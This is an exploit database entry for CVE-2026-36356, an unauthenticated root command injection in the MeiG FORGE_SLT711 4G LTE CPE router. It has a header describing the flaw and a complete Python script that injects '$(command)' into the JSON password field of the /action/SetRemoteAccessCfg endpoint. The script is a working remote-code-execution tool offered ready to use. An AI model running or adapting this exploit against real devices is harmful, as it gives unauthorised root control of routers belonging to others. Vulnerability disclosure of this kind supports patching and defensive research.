Share
## https://sploitus.com/exploit?id=PACKETSTORM:222181
# Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection
    # Date: 2026-05-03
    # Exploit Author: Daniil Gordeev
    # Vendor Homepage: http://www.meigsmart.com
    # Software Link: N/A (firmware distributed via carrier channels)
    # Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)
    # Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48
    # CVE: CVE-2026-36356
    """
    Unauthenticated RCE โ€” MeiG FORGE_SLT711 (Ortel 4G LTE CPE)
    GoAhead /action/SetRemoteAccessCfg OS command injection
    
    Vuln:  JSON "password" field โ†’ sprintf("echo root:\"%s\"|chpasswd") โ†’ system()
    Auth:  None (endpoint missing from route.txt auth list)
    Root:  Commands execute as uid=0(root)
    Type:  Blind โ€” output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil
    
    Discovered: 2026-02-21
    Tested on:  FW MDM9607.LE.1.0-00110-STD.PROD-1
    """
    
    import argparse
    import json
    import sys
    import urllib.request
    import urllib.error
    
    def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:
        url = f"http://{ip}:{port}/action/SetRemoteAccessCfg"
        payload = json.dumps({"password": f"$({cmd})"})
    
        req = urllib.request.Request(
            url,
            data=payload.encode(),
            headers={"Content-Type": "application/json"},
            method="POST",
        )
    
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode()
                data = json.loads(body)
                if data.get("retcode") == 0:
                    print(f"[+] retcode:0 โ€” command executed as root")
                    return True
                else:
                    print(f"[-] Unexpected response: {body}")
                    return False
        except urllib.error.URLError as e:
            print(f"[-] Connection failed: {e}")
            return False
        except Exception as e:
            print(f"[-] Error: {e}")
            return False
    
    def main():
        p = argparse.ArgumentParser(
            description="MeiG SLT711 GoAhead unauthenticated RCE (blind)",
            epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'",
        )
        p.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)")
        p.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
        p.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)")
        p.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
        args = p.parse_args()
    
        print(f"[*] Target:  {args.ip}:{args.port}")
        print(f"[*] Command: {args.cmd}")
        print(f"[*] Payload: $({{cmd}}) inside password field")
    
        ok = exploit(args.ip, args.cmd, args.port, args.timeout)
        sys.exit(0 if ok else 1)
    
    if __name__ == "__main__":
        main()